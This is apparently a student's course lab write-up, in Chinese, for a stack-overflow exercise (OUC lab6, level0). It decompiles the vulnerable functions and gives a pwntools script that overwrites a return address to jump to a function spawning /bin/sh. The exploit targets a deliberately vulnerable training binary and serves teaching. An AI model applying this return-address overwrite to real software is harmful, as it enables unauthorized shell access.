OUC-网络安全导论-lab6-stackoverflow

OUC-网络安全导论-lab6-stackoverflow

一、实验目标

lab6 包括 5 个题目 (lab6-[1-5])，请分析 5 个题目找到其中的漏洞，写出利用脚本并拿到 shell。

其中 lab6-1/2/3 比较简单，主要考察栈溢出和 shellcode 的简单使用，lab6-4 需要绕过 canary，lab6-5 增加了 一点点点难度。

二、实验内容&实验步骤

level0:

step1：通过Ghidra反汇编，发现 seeme函数已经可以将shell拿到，因此不用写shellcode，只需将sayhi函数的返回地址改成seeme函数的入口地址即可。

void seeme(void)
{
  system("/bin/sh");
  return;
}

step2：找到seeme的入口

step3 ：查看sayhi的函数

int sayhi()
{
  char v1; // [esp+0h] [ebp-28h]

  puts("Could I know your name?");
  myRead((int)&v1, 256);
  return printf("Hi, %s.\n", &v1);
}

step4：发现char类型变量，它在栈的ebp-28h的位置，之后是输出一个字符串，然后调用了myRead函数，查看此函数的伪代码

int myRead(int param_1,int param_2)
{
  int local_10;
  
  local_10 = 0;
  while( true ) {
    if (param_2 <= local_10) {
      return local_10;
    }
    read(0,(void *)(param_1 + local_10),1);
    if (*(char *)(param_1 + local_10) == '\n') break;
    local_10 = local_10 + 1;
  }
  *(undefined *)(param_1 + local_10) = 0;
  return local_10;
}

step5：可以看出来，它的功能是使用C语言的库函数read读取a2个字符到地址a1中。看到这儿，就已经可以发现程序的漏洞所在了，v1是一个char类型的变量，它只能存储一个字符，但是在调用myRead函数时，却让它读取256个字符，这样极容易发生栈溢出。前面说过，v1在栈上的位置是ebp-28h，而我们输入的字符串的首地址就是v1的地址，那么我们可以输入28h个填充字符覆盖从v1到ebp的空间，再输入4个填充字符覆盖旧的ebp，最后输入seeme函数的入口地址0x080485B3（小端方式）。

step6：python代码

from pwn import *
conn=process('/home/stu39/lab6/level0') 
seeme=0x080485B3 
conn.recv()
payload = b'a' * (0x28 + 4)+p32(seeme) 
conn.sendline(payload) 
conn.recv()
conn.interactive()

step7：建立vim文件，并写入python文件

step8：添加执行权限，保存，并运行

chmod +x /home/stu39/lab6/level0 

:wq //保存并退出

python3 level0.py //用python运行level0.py